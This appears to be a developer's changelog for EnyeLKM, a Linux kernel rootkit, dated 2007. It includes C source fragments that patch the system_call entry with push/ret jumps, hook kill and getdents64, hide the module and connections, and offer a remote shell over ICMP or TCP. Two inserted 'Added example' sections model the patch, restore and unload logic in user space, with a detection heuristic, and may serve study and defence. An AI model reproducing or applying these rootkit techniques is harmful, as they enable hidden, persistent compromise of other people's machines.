EnyeLKM 1.2
Written by David Reguera Garcia   
Saturday 2 June 2007

It does not bring as many new features as version 1.1, but the internal techniques have changed: the way connections are hidden from netstat is new, and the syscall handler has been recoded. Some bugs have also been fixed and the code adapted to the newer kernels; it has been tested on distributions with heavily modified kernels such as Fedora Core 6 and Mandriva 2007 (and also with the latest kernel available to date, 2.6.21.1). As a new feature for the user, it includes the option of requesting the remote shell over TCP, in case ICMP is blocked by an intermediate firewall.

Public version: http://www.enye-sec.org/

Last update( Saturday 2 June 2007 )


EnyeLKM 1.1.4-fix
Written by David Reguera Garcia   
Saturday 24 March 2007


Fixed the hacked_read (atomic_t) problem that affected unloading, and corrected the version in the Makefile.

In the next version swapper will be implemented :-).

PS: Unloading is not possible until the reads have finished; if it were not done this way, it would be detected straight away through the syslog messages.

Last update( Saturday 24 March 2007 )


EnyeLKM 1.1.4
Written by David Reguera Garcia   
Friday 23 March 2007


New module: restore_memory.c. It saves the memory that the jumps overwrite so that it can be restored when the module is unloaded (before this it was not possible to unload it).

create_push_ret( & push_ret, (unsigned long) new_idt );
save_memory( (unsigned long) p, & backup_memory );
write_push_ret( ( void *) p, & push_ret );

LKM's cleanup function:
    restore_memory( & backup_memory );

    __dev_remove_pack( & my_pkt );

    /* let processes that are 'reading' finish */
    while ( read_activo != 0 || can_unload_lkm != 1 )
        schedule();

Modification in idt:
void new_idt( void )
{
    can_unload_lkm = 0;
    ....
    can_unload_lkm = 1;

    JmPushRet( after_call )
...

The flag works as a traffic light: it is red while any redirected system call is executing, and the cleanup function waits for it to turn green before unloading.

PS: To test it, comment out the call to hide_module().
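Added example, not EnyeLKM's own code: a user-space model of the cleanup traffic light above (can_unload_lkm cleared on entry to new_idt, set again just before JmPushRet(after_call)) placed next to an in-flight counter, driven by a scripted interleaving of two tasks that overlap inside the hook. The scheme names, the scripted order and the counter alternative are assumptions made for the demonstration; no kernel is involved.

```c
/* Added example; not EnyeLKM's own code. Models the cleanup "traffic light"
 * from the 1.1.4 notes (can_unload_lkm cleared on entry to new_idt, set on
 * exit) next to an in-flight counter, using a scripted interleaving of two
 * tasks that overlap inside the hook. No kernel involved. */
#include <stdio.h>

static int can_unload_lkm = 1;   /* the page's flag: 0 while a caller is inside */
static int in_flight = 0;        /* alternative: how many callers are inside (atomic_t in a real LKM) */

static void flag_enter(void)  { can_unload_lkm = 0; }
static void flag_exit(void)   { can_unload_lkm = 1; }
static int  flag_safe(void)   { return can_unload_lkm == 1; }

static void count_enter(void) { in_flight++; }
static void count_exit(void)  { in_flight--; }
static int  count_safe(void)  { return in_flight == 0; }

typedef struct {
    const char *name;
    void (*enter)(void);   /* start of new_idt */
    void (*exit)(void);    /* just before JmPushRet(after_call) */
    int  (*safe)(void);    /* the condition cleanup_module spins on */
} scheme_t;

const scheme_t flag_scheme  = { "single flag",       flag_enter,  flag_exit,  flag_safe  };
const scheme_t count_scheme = { "in-flight counter", count_enter, count_exit, count_safe };

/* Scripted interleaving (assumed, not measured): A enters the hook, B enters
 * too (other CPU or preemption), A finishes, cleanup_module evaluates its
 * condition, then B finishes. Returns 1 if the scheme reports "safe to
 * unload" while B is still inside the redirected path. */
int reports_safe_while_busy(const scheme_t *s) {
    int premature;
    s->enter();            /* A */
    s->enter();            /* B */
    s->exit();             /* A leaves; with the flag this overwrites B's "busy" */
    premature = s->safe(); /* cleanup_module looks here */
    s->exit();             /* B leaves */
    return premature;
}

/* The non-overlapping case, which both schemes get right: A enters and leaves, then cleanup checks. */
int reports_safe_when_idle(const scheme_t *s) {
    s->enter();
    s->exit();
    return s->safe();
}

int main(void) {
    const scheme_t *schemes[] = { &flag_scheme, &count_scheme };
    int i;
    for (i = 0; i < 2; i++)
        printf("%-18s idle: safe=%d   overlapped: unloads-while-busy=%d\n",
               schemes[i]->name,
               reports_safe_when_idle(schemes[i]),
               reports_safe_while_busy(schemes[i]));
    return 0;
}
```

The counter closes the overlap problem the single flag has, but it does not close the window between the cleanup check and restore_memory(), nor does it cover a task that has already executed the patched push but not yet the ret; for that reason the kernel's own text patchers rewrite code only while the other CPUs are held off.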

Last update( Friday 23 March 2007 )


EnyeLKM 1.1.3
Written by David Reguera Garcia   
Thursday 22 March 2007


EnyeLKM 1.1.2 obtains the SYSENTER entry point at run time with the instruction:
rdmsr( MSR_IA32_SYSENTER_EIP, psysenter_entry, v2 );

NOW IT DOES NOT GIVE A SINGLE WARNING!!! :-) when running make.
Also, base.c has been completely rewritten and two new modules have been created:

extern_symbols: where the functions that obtain symbols external to the LKM live, for example:
/* thx to Int27h :-). */
void * get_sysenter_entry( void )
{
    void * psysenter_entry = NULL ;
    unsigned long v2 ;

    if ( boot_cpu_has( X86_FEATURE_SEP ) )
        rdmsr( MSR_IA32_SYSENTER_EIP, psysenter_entry, v2 );
    else
        return NULL;

    return psysenter_entry;
}

The lowlevel_layer module has also been created: thanks to it, the modules that scan memory for opcodes and patch functions can be written at a much higher level of abstraction, for example:

void set_idt_handler( void * system_call )
{
    unsigned char * p;
    push_ret_t push_ret;

    p = (unsigned char *) system_call;

    /* first jump */
    while ( !is_jnb_opcode( (unsigned char *) p ) )
        p ++;

    p -= DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB;

    create_push_ret( & push_ret, (unsigned long) new_idt );
    write_push_ret( ( void *) p, & push_ret );

...

And before, this looked like:

void set_idt_handler(void *system_call)
{
    unsigned char *p;
    unsigned long *p2;

    p = (unsigned char *) system_call;

    /* first jump */
    while (!((*p == 0x0f) && (*(p+1) == 0x83)))
        p++;

    p -= 5;

    *p++ = 0x68;
    p2 = (unsigned long *) p;
    *p2++ = (unsigned long) new_idt;

    p = (unsigned char *) p2;
    *p = 0xc3;

As can be seen, it is now much easier to abstract away from the problem thanks to the "lowlevel" layer.
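Added example, not EnyeLKM's own code: a user-space model of the locate / save / patch / restore cycle that the 1.1.3 set_idt_handler and the 1.1.4 restore_memory notes describe, plus the defender-side check that looks for the resulting trampoline. It runs against a constructed byte buffer standing in for the system_call entry stub, so it needs neither a kernel nor root; the buffer contents, the stand-in address for new_idt and the is_patched heuristic are assumptions made for the demonstration, while the push_ret_t / backup_memory_t names mirror the page's.

```c
/* Added example; not EnyeLKM's own code. A user-space model of the
 * locate / save / patch / restore cycle from the 1.1.3 and 1.1.4 notes,
 * run against a constructed byte buffer standing in for the system_call
 * entry stub, so it needs neither a kernel nor root. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PUSH_RET_LEN 6                          /* 68 imm32 c3 : push $imm32 ; ret */
#define DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB 5   /* cmpl $imm32,%eax (3d imm32) precedes the jae */

typedef struct { unsigned char bytes[PUSH_RET_LEN]; } push_ret_t;
typedef struct { unsigned char *where; unsigned char bytes[PUSH_RET_LEN]; } backup_memory_t;

/* Constructed stand-in for the i386 2.6 system_call prologue (not real kernel bytes):
 *   50                      push %eax
 *   fc                      cld
 *   3d 40 01 00 00          cmpl $0x140,%eax        <- the 6-byte patch lands here
 *   0f 83 10 00 00 00       jae  syscall_badsys
 *   ff 14 85 d0 9a 31 c0    call *0xc0319ad0(,%eax,4)
 *   c3                      ret (padding)                                          */
unsigned char fake_system_call[] = {
    0x50, 0xfc,
    0x3d, 0x40, 0x01, 0x00, 0x00,
    0x0f, 0x83, 0x10, 0x00, 0x00, 0x00,
    0xff, 0x14, 0x85, 0xd0, 0x9a, 0x31, 0xc0,
    0xc3
};

static int is_jnb_opcode(const unsigned char *p) { return p[0] == 0x0f && p[1] == 0x83; }

/* Offset of the cmpl that gets overwritten (jae minus 5), or -1 if no jae is found. */
long find_patch_offset(const unsigned char *system_call, size_t len) {
    size_t i;
    for (i = DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB; i + 1 < len; i++)
        if (is_jnb_opcode(system_call + i))
            return (long)(i - DISTANCE_FROM_CMP_NR_SYSCALL_TO_JNB);
    return -1;
}

void create_push_ret(push_ret_t *pr, uint32_t target) {
    pr->bytes[0] = 0x68;                              /* push imm32 */
    pr->bytes[1] = (unsigned char)(target);           /* little-endian immediate */
    pr->bytes[2] = (unsigned char)(target >> 8);
    pr->bytes[3] = (unsigned char)(target >> 16);
    pr->bytes[4] = (unsigned char)(target >> 24);
    pr->bytes[5] = 0xc3;                              /* ret pops it: an absolute jump */
}

void save_memory(unsigned char *p, backup_memory_t *b) { b->where = p; memcpy(b->bytes, p, PUSH_RET_LEN); }
void write_push_ret(unsigned char *p, const push_ret_t *pr) { memcpy(p, pr->bytes, PUSH_RET_LEN); }
void restore_memory(const backup_memory_t *b) { memcpy(b->where, b->bytes, PUSH_RET_LEN); }

/* Defender-side heuristic (assumed, not from the page): a push/ret trampoline inside the
 * entry stub. Returns 1 and the pushed target when found, 0 otherwise. Comparing the whole
 * text against a known-good image is the more reliable check; this flags only this pattern. */
int is_patched(const unsigned char *stub, size_t len, uint32_t *target) {
    size_t i;
    for (i = 0; i + PUSH_RET_LEN <= len; i++) {
        if (stub[i] == 0x68 && stub[i + 5] == 0xc3) {
            if (target)
                *target = (uint32_t)stub[i + 1] | (uint32_t)stub[i + 2] << 8 |
                          (uint32_t)stub[i + 3] << 16 | (uint32_t)stub[i + 4] << 24;
            return 1;
        }
    }
    return 0;
}

/* Full cycle. Returns 0 when every step behaves as the notes describe, else the failing step. */
int run_demo(void) {
    unsigned char known_good[sizeof fake_system_call];
    backup_memory_t backup_memory;
    push_ret_t push_ret;
    uint32_t target = 0;
    long off;

    memcpy(known_good, fake_system_call, sizeof known_good);
    off = find_patch_offset(fake_system_call, sizeof fake_system_call);
    if (off < 0) return 1;

    create_push_ret(&push_ret, 0xd08e3000u);          /* constructed address standing in for new_idt */
    save_memory(fake_system_call + off, &backup_memory);
    write_push_ret(fake_system_call + off, &push_ret);
    if (!is_patched(fake_system_call, sizeof fake_system_call, &target) || target != 0xd08e3000u) return 2;

    /* The patch clobbers the 0x0f of the jae, so the opcode scan can no longer find the
     * site: this is why unloading needs the saved backup rather than a second scan. */
    if (find_patch_offset(fake_system_call, sizeof fake_system_call) != -1) return 3;

    restore_memory(&backup_memory);
    if (memcmp(known_good, fake_system_call, sizeof known_good) != 0) return 4;
    return 0;
}

int main(void) {
    printf("demo result: %d (0 = patched, detected, restored byte-for-byte)\n", run_demo());
    return 0;
}
```

The point worth noticing in run_demo is step 3: once the 6-byte trampoline is in place, the 0f 83 key that set_idt_handler scans for is half gone, so the module cannot re-locate its own patch by scanning and must keep the backup_memory record from the moment it wrote the jump.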

The next thing I will develop is the possibility of unloading the module; at least one more module will have to be created to manage the memory with WRITE-AND-RESTORE for unloading.

I remind you that development can be followed in detail at:
http://fr33project.org/enyelkm/

Last update( Thursday 22 March 2007 )


EnyeLKM 1.1.2
Written by David Reguera Garcia   
Tuesday 20 March 2007


EnyeLKM with easy-hook (I have not yet added myself to the banner credits). The IDT method is used, but in a much more elegant way than keeping it in a "hardcoded" buffer:

#include "idt.h"

#define ASMIDType( valor ) \
    __asm__ volatile( valor );

#define JmPushRet( valor ) \
    ASMIDType \
    ( \
        "push %0 \n" \
        "ret \n" \
        \
        : : "m" (valor) \
    );

#define CallHookedSyscall( valor ) \
    ASMIDType( "call * %0" : : "r" (valor) );

void hook( void )
{
    register volatile int eax asm( "eax" );

    switch( eax )
    {
        case __NR_kill:
            CallHookedSyscall( hacked_kill );
            break;

        case __NR_getdents64:
            CallHookedSyscall( hacked_getdents64 );
            break;
        ....
        default:
            JmPushRet( dire_call );
            break;
    }

    JmPushRet( after_call );
}

void new_idt( void )
{
    ASMIDType
    (
        "cmp %0, %%eax \n"
        "jae syscallmala \n"
        "jmp hook \n"

        "syscallmala: \n"
        "jmp dire_exit \n"

        : : "i" (NR_syscalls)
    );

Last update( Tuesday 20 March 2007 )